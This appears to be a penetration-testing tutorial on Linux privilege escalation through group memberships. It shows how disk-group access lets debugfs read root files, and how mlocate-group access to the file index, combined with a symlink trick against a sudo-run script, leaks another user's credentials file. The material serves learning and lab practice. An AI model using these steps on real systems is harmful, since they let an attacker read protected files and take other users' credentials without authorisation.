Groups

Disk

The disk group in Linux is a privileged system group intended to grant access to raw disk devices, like /dev/sda, /dev/sdb, etc. It allows users to perform low-level operations on storage devices, such as partitioning, formatting, mounting/unmounting, etc.

Membership in the disk group is highly sensitive — users with this access can read or modify any data on the system, bypassing file permissions entirely.

# Confirm group membership
ian@DANTE-NIX07:~$ id
uid=1001(ian) gid=1001(ian) groups=1001(ian),6(disk)

# Identify the root fine system (/)
ian@DANTE-NIX07:~$ df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda5        14G  7.9G  5.2G  61% /

# Open the block service
ian@DANTE-NIX07:~$ debugfs /dev/sda5
debugfs 1.45.5 (07-Jan-2020)
No entry for terminal type "xtrem";
using dumb terminal settings.

# Failed attempt to create a directory
debugfs:  mkdir test
mkdir: Filesystem opened read/only

# Read a root file 
debugfs:  cat /root/flag.txt

Filter

The filter group is usually a custom group, not a default Linux group, and it’s commonly used to manage permissions around mail content filtering components. It can be assigned writable access to sensitive files, such as disclaimer files, which can lead to PE.

Mlocate

The mlocate group exists on Linux systems with the mlocate utility installed, which maintains a searchable index of the filesystem at /var/lib/mlocate/mlocate.db. This database is normally restricted, as it may list files and directories that a user cannot access directly. However, members of the mlocate group can read it and extract full file paths — including sensitive or hidden files like credentials, SSH keys, or backups.

While the database does not expose file contents or permissions, it reveals what exists and where, making it highly valuable for enumeration and targeting during privilege escalation. Thus, being in the mlocate group is a significant information disclosure vector. It doesn’t give direct access to files, but it reveals what to target, which is often the hardest part of privilege escalation.

As an example, let's say that on a Linux host (kali), a user named bob is part of the mlocate group, thus, it has access to the prebuilt file index database located at /var/lib/mlocate/mlocate.db.

$ id
uid=1000(bob) gid=1000(bob) groups=1000(bob),100(users),119(mlocate)

$ find / -group mlocate 2>/dev/null
/var/lib/mlocate/mlocate.db
/usr/bin/mlocate

A privileged script exists at /usr/bin/sync.sh, owned by root, world-readable and executable. It’s configured in sudo -l such that bob can run it as user mark:

$ sudo -l
(bob) may run the following commands on kali:
    (mark) /usr/bin/sync.sh
    
$ ls -la /usr/bin/sync.sh
-rwxr-xr-x 1 root root 386 Jul 13  2022 /usr/bin/sync.sh

Reviewing the script reveals that it accepts a file path as an argument. It then compares that file to /home/mark/personal/notes.txt using diff, and if a difference is detected, it overwrites notes.txt with the provided file. However, it includes two constraints:

1. If no argument is supplied, it exits

2. If the file path contains the string mark, it also exits. This prevents directly referencing the target file.

#!/bin/bash

if [ -z $1 ]; then
    echo "error: note missing"
    exit
fi

note=$1

if [[ "$note" =~ .*mark.* ]]; then
    echo "error: forbidden"
    exit
fi

difference=$(diff /home/mark/personal/notes.txt $note)

if [[ -z $difference ]]; then
    echo "no update"
    exit
fi

echo "Difference: $difference"
cp $note /home/mark/personal/notes.txt
echo "[+] Updated."

This creates a controlled file write into a sensitive path owned by another user. But to exploit it, several conditions must be met:

• The name mark cannot appear in the input path.

• The target file must be known ahead of time.

• The file being supplied must be different from notes.txt.

Since direct browsing into /home/mark/ is not possible due to permission restrictions, the membership in the mlocate group becomes useful. The user can extract strings from the mlocate database to enumerate the contents of /home/mark/personal/:

$ grep -a -o -P '[\x20-\x7E]{4,}' /var/lib/mlocate/mlocate.db | grep '/home/mark/personal' -A10
# or 
$ strings /var/lib/mlocate/mlocate.db | grep '/home/mark/personal'
/home/mark/personal/creds.txt

Although the script prevents paths containing mark, this limitation can be bypassed using a symbolic link. A symlink pointing to the real target is created using a harmless name:

$ ln -sf /home/mark/personal/creds.txt decoy

When passed to the script, the symlink is followed. The diff command compares the contents of creds.txt to notes.txt, and if they differ, the script prints the diff and overwrites notes.txt with creds.txt.

$ sudo -u mark /usr/bin/sync.sh decoy

This results in the credentials being leaked directly to standard output via the diff command, satisfying all script conditions while bypassing path restrictions through symlink manipulation.